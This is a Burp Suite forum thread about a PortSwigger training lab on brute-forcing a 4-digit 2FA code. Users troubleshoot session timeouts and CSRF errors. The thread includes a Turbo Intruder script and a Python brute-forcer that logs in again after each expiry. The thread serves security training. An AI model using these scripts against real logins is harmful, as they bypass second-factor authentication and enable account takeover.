Burp Suite User Forum

Lab: 2FA bypass using a brute-force attack

Roman | Last updated: Jun 11, 2020 06:39PM UTC

I have been working on this one for a while. Working from home, outside the corporate network, I have found the responses come back very slowly compared to some other similar labs I have run. Therefore, when I ran my solution, I always ran out of time before I could find the right answer (a 302) coming back. My solution to that problem was to open up 10 Burp Suite instances on my laptop and run each Intruder against a different range. I did this because the cookie jar was causing issues for attacks running at the same time, so I needed a unique cookie jar per Intruder thread. Unfortunately, after running this attack several times and hitting a 302, I found the code tested on the request when the 302 was received was not the right code to solve the lab. I tried a whole bunch of other codes on other Intruders falling around the same time frame, just in case the wires got crossed somehow. None of them worked either. Mystified, I finally gave in and looked at your solution. This turned out to be exactly my original solution without the 10 Intruders, which won't work for me in my current slow network environment. I was wondering if there was any way to disable the session timeout or lengthen it enough to let me test the entire keyspace. I guess until then I will keep trying the single Intruder until I get lucky enough to get a 302 in random rather than sequential mode. Thanks, Roman

Ben, PortSwigger Agent | Last updated: Jun 12, 2020 09:09AM UTC

Hi Roman, Thank you for your feedback. We did not encounter this when we were testing this lab but we have had several people mention that the lab is causing them issues due to the reasons that you have highlighted. In view of this, we have changed the lab slightly so that the solution is not in the higher range of numbers. Are you able to try the lab again today to see if it improves the situation for you?

Luis | Last updated: Jul 22, 2020 03:53PM UTC

Hi PortSwigger, What range should we be scanning? Thanks!

Ben, PortSwigger Agent | Last updated: Jul 22, 2020 06:35PM UTC

Hi, You should still try the range 0-9999 as detailed in the lab instructions but, as mentioned in the above message, the 2FA value will not be in the higher range of numbers. This should mean users will find the answer before they encounter any potential lab timeout issues.

Luis | Last updated: Jul 23, 2020 03:52PM UTC

It worked thanks!

MBZ | Last updated: Aug 02, 2020 03:01PM UTC

It's not working for me. I've tried two times to no avail.

Ben, PortSwigger Agent | Last updated: Aug 03, 2020 08:19AM UTC

Hi, Are you able to provide us with some details of the issues that you are encountering whilst trying to solve this lab so that we can assist you?

halfluke | Last updated: Aug 20, 2020 09:10PM UTC

Getting "session expired" after about 4470 attempts starting from 0000, and no solution found. Expert, OK... uselessly frustrating is not.

Ben, PortSwigger Agent | Last updated: Aug 21, 2020 07:16AM UTC

Hi, What range of numbers do you get up to when performing the attack? As noted earlier in the thread, we changed the lab so that the solution would always occur in the lower range of numbers to make it slightly less frustrating for users.

halfluke | Last updated: Aug 21, 2020 11:14AM UTC

As I said, from 0000 up. It worked in the end after 4 attempts. Thanks

shubham | Last updated: Sep 02, 2020 05:02AM UTC

How do I do this with Turbo Intruder? Because I have tried so many times and my session expired after 300-400 requests!

Uthman, PortSwigger Agent | Last updated: Sep 02, 2020 02:07PM UTC

You may find the code in this thread helpful: - https://forum.portswigger.net/thread/lab-2fa-bypass-using-a-brute-force-attack-714dab1f Alternatively, you can try writing your own script. There are helpful generalized examples in the GitHub repo: - https://github.com/PortSwigger/turbo-intruder/tree/master/resources/examples

Motasem | Last updated: Oct 03, 2020 08:55AM UTC

Hi, I have tried many times but it doesn't work; the lab session expires after reaching 1600 requests, starting from 0 to 9999! Would you please confirm it is still working in the lower range? Thank you,

Motasem | Last updated: Oct 03, 2020 11:35AM UTC

Finally!! After the 7th try :) The code: 0315

deep1 | Last updated: Nov 14, 2020 11:40AM UTC

Hello. I'm trying to solve the 2FA bypass using a brute-force attack lab, but after sending the first request I get:

```http
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Set-Cookie: session=EusRA8AnKybVaw5Md6cluwhZIH6gCFAG; Path=/; Secure; HttpOnly; SameSite=None
Connection: close
Content-Length: 60

"Invalid CSRF token (session does not contain a CSRF token)"
```

I don't know if I'm doing something wrong or this is a lab issue.

deep1 | Last updated: Nov 15, 2020 09:14AM UTC

Hello again. I tried about 30 times and I get the same error. It would be great if someone could help me with this, please.

Ben, PortSwigger Agent | Last updated: Nov 16, 2020 09:48AM UTC

Hi, One of our users, Michael Sommer, has produced some YouTube videos detailing the solutions for most of our labs. You might find it easier to follow along with these, rather than our text solution. The video for this lab is below: https://www.youtube.com/watch?v=B6JuMb3M-KA

deep1 | Last updated: Nov 16, 2020 02:31PM UTC

Well, I saw that video, but this is a lab issue. Now I'm sure I'm doing the steps correctly, and I also tried to make a Python script for it, but I get "invalid CSRF" after the first request I send; the response code is 400.

deep1 | Last updated: Nov 16, 2020 03:16PM UTC

Do I need to set the range 0-9999 every time I get a 400 error?

Ben, PortSwigger Agent | Last updated: Nov 17, 2020 08:51AM UTC

Hi, To clarify, what step of the solution are you having issues with and what steps have you taken so far?

deep1 | Last updated: Nov 17, 2020 05:55PM UTC

OK, so first I log in with the carlos creds and try a random number in the mfa-code, like 1234. After I get kicked out, I select these 3 requests: GET /login, POST /login and GET /login2, and I create a session handling rule in Project options with the Macro Recorder. Then I send the POST /login2 request in Repeater with 1 thread. At first I got a 400 error on my first request, but now after 200 attempts I get a 400 error and I have to repeat the whole steps again.

Ben, PortSwigger Agent | Last updated: Nov 18, 2020 08:58AM UTC

Hi, If you are getting 400 statuses returned straight away then that would suggest something is not quite right in the requests that you are trying to send via Intruder. It might be easier to troubleshoot this if you can send us some screenshots of your Intruder configuration (and your macro) to support@portswigger.net so that we can take a look for you.

deep1 | Last updated: Nov 18, 2020 10:15AM UTC

Hello, yes, sure, I can do that, and thank you so much.

silver.io | Last updated: Jan 05, 2021 02:09AM UTC

Can you perhaps be more specific regarding the adjusted range of numbers? Is the token guaranteed to be in the range 0-5000 or something? My session keeps timing out like many others. Furthermore, if we know the range is reduced to 0-5000 is there anyway we can optimize / make the search faster? My session is timing out before 5000. Thanks.

BaaL | Last updated: Jan 05, 2021 04:52PM UTC

Hi silver.io, I don't know if the token is guaranteed to be in the 0-5000 range or not, but my token was 1979. My trick is to keep it in a small number range using Turbo Intruder, like 0-3000, before the 504 status code kicks in. This is my Turbo code:

```python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           engine=Engine.BURP  # use Burp's network stack, including upstream proxies etc.
                           )

    # Queue the 4-digit codes, zero-padded, in place of the %s marker in the request
    for i in range(0, 5000):
        engine.queue(target.req, str(i).rjust(4, '0'))

    #for word in open('/usr/share/dict/words'):
    #    engine.queue(target.req, word.rstrip())


def handleResponse(req, interesting):
    # Keep only the hit (302) and the point where the lab cut us off (504);
    # compare the status code rather than searching the whole response text for '302'
    if req.status in (302, 504):
        table.add(req)
```

Tip: Remember to add Extender to scope to enable macros for Turbo. It's disabled by default.
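
The macro-plus-retry approach described in deep1's post above (GET /login, POST /login, GET /login2, then POST /login2 through a session handling rule) and in BaaL's Turbo Intruder script comes down to one thing: when the session dies, log in again and carry on from the code you were on rather than from 0000. The following is an added example of that loop, not code from the lab or from PortSwigger. Because the lab cannot be reached offline, it runs against a constructed in-memory stand-in whose credentials, expiry threshold (wrong codes per session) and response texts are assumptions modelled on this thread.

```python
"""Constructed simulation of the lab's login -> 2FA flow and a brute-forcer that
re-authenticates (the 'macro') whenever the session is expired, instead of
restarting the keyspace from 0000. Not the lab's code; credentials, the
expiry threshold and the response texts are assumptions modelled on the thread."""
import secrets

# Constructed credentials for the simulation; the real lab tells you the victim's.
USERNAME, PASSWORD = "carlos", "constructed-password"


class LabSim:
    """Stand-in for the target. Each session carries a CSRF token; a session is
    dropped after max_failed wrong codes, after which further requests on it get
    the 400 'Invalid CSRF token (session does not contain a CSRF token)' response
    quoted in this thread (assumed behaviour, not the lab's actual rule)."""

    def __init__(self, secret_code, max_failed=300):
        self.secret_code = secret_code
        self.max_failed = max_failed
        self.sessions = {}      # session cookie -> {"csrf", "user", "failed"}
        self.mfa_requests = 0   # how many POST /login2 requests were made

    def get_login(self):
        """GET /login: issues a fresh session cookie and CSRF token."""
        sid, csrf = secrets.token_hex(16), secrets.token_hex(16)
        self.sessions[sid] = {"csrf": csrf, "user": None, "failed": 0}
        return 200, {"Set-Cookie": sid, "csrf": csrf}

    def post_login(self, sid, csrf, username, password):
        """POST /login: first factor; success redirects to the 2FA page."""
        s = self.sessions.get(sid)
        if s is None or s["csrf"] != csrf:
            return 400, {}
        if (username, password) != (USERNAME, PASSWORD):
            return 200, {}
        s["user"] = username
        return 302, {"Location": "/login2"}

    def post_login2(self, sid, csrf, mfa_code):
        """POST /login2: second factor. Wrong codes count against the session."""
        self.mfa_requests += 1
        s = self.sessions.get(sid)
        if s is None or s["csrf"] != csrf or s["user"] is None:
            return 400, {}
        if mfa_code == self.secret_code:
            return 302, {"Location": "/my-account"}
        s["failed"] += 1
        if s["failed"] >= self.max_failed:
            del self.sessions[sid]      # 'session expired': the next request is a 400
        return 200, {}


def login_macro(app):
    """The macro from the thread: GET /login (fresh session + CSRF token), then
    POST /login. GET /login2 is folded into the first step here. Returns (sid, csrf)."""
    _, hdrs = app.get_login()
    sid, csrf = hdrs["Set-Cookie"], hdrs["csrf"]
    status, hdrs = app.post_login(sid, csrf, USERNAME, PASSWORD)
    if status != 302 or hdrs.get("Location") != "/login2":
        raise RuntimeError("first factor failed; check the credentials")
    return sid, csrf


def brute_force(app, upper=10000):
    """Try 0000..upper-1 in order. On a 400 (session gone) re-run the macro and
    retry the *same* code, so progress through the keyspace is never lost."""
    sid, csrf = login_macro(app)
    relogins = 0
    for i in range(upper):
        code = f"{i:04d}"
        fails_for_code = 0
        while True:
            status, hdrs = app.post_login2(sid, csrf, code)
            if status == 400:
                fails_for_code += 1
                if fails_for_code > 1:  # 400 again right after a fresh login: the request is wrong
                    raise RuntimeError("still 400 after re-login; fix the request, not the session")
                relogins += 1
                sid, csrf = login_macro(app)
                continue
            # Check where the 302 points, not just the status code
            if status == 302 and hdrs.get("Location") == "/my-account":
                return {"code": code, "relogins": relogins, "mfa_requests": app.mfa_requests}
            break
    return None


if __name__ == "__main__":
    # -> {'code': '0315', 'relogins': 3, 'mfa_requests': 319}
    print(brute_force(LabSim("0315", max_failed=100)))
```

Against the real lab you would replace LabSim with requests to the lab URL (the CSRF token comes from the login form, the session from the Set-Cookie header); the part that carries over is that a 400 triggers a re-login and a retry of the same code, while a 302 only counts as a hit when it points at /my-account. A second consecutive 400 for the same code aborts the run, because that means the request itself is wrong, which is the situation deep1 hit on the very first request, not that the session expired.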

Ben, PortSwigger Agent | Last updated: Jan 06, 2021 08:40AM UTC

Hi, I believe that the token should now be generated somewhere in the 0000-3000 range in order to make the lab easier to manage.

Ariel | Last updated: Jan 17, 2021 03:01PM UTC

I can't reach 3000 requests; I get status code 504 after 2700 requests. I have tried 4 times already.

Ariel | Last updated: Jan 17, 2021 05:15PM UTC

Hi, after 5 tries I got a 302, but if I right-click and choose "Show response in browser" it doesn't log in to the account.

Ariel | Last updated: Jan 17, 2021 05:20PM UTC

I did not click "Request in browser". I tried it in two browsers, Chromium and Firefox.

Ben, PortSwigger Agent | Last updated: Jan 18, 2021 07:14PM UTC

Hi, Once you have a request that has received a 302 response you then need to right click the request and select 'Show response in browser'. Once this has loaded in your browser you then need to click the 'My account' link in order to successfully solve the lab. We mentioned this earlier in this forum thread but one of our users has produced a series of videos providing walkthroughs of most of our labs - are you able to check the following video to make sure that you are matching the steps used: https://www.youtube.com/watch?v=B6JuMb3M-KA

Ariel | Last updated: Jan 20, 2021 10:52AM UTC

Hi, I saw this video and many others before I commented, and I followed the steps. It still doesn't give My account when I right-click the request and select "Show response in browser".

Ben, PortSwigger Agent | Last updated: Jan 20, 2021 11:37AM UTC

Hi, If you are still having issues with this it might be easier to send us an email at support@portswigger.net with some screenshots of what you are seeing when you try and solve the lab. We can then take a look and see if we can help you further. I ran through this lab yesterday and was able to solve it using the solution provided so it is functioning and the solution is still accurate.